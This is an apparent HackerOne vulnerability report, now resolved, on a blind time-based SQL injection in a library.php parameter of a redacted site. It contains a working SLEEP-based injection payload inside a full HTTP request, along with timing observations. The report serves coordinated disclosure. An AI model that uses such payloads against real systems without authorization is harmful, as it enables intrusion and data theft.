SQL injection on the https://████/
High
Vulnerability Details
##Description
Hello. I was able to find Blind SQL injection on the https://███/
Database appears to be MySQL 5.
##POC
```
GET /library.php?path=test&doc_id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(1)))WUeh) HTTP/1.1
Host: ██████
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en,ru;q=0.9,en-US;q=0.8,uk;q=0.7
Cookie: _ga=GA1.2.1697249984.1548431559
```
By issuing sleep(0) response will be delayed to 0 seconds.
By issuing sleep(1) response will be delayed to 5 seconds.
By issuing sleep(2) response will be delayed to 10 seconds.
By issuing sleep(5) response will be delayed to 25 seconds.
As POC, I retrieved count of databases (3). No other information was accessed (such as tables or data):
Apparently, SQL statement is executing 5 times on the database side, because response time always 5 times bigger than supplied sleep value.
## Impact
SQL injection usually have high-critical impact.
Actions
View on HackerOneReport Stats
- Report ID: 488795
- State: Closed
- Substate: resolved
- Upvotes: 22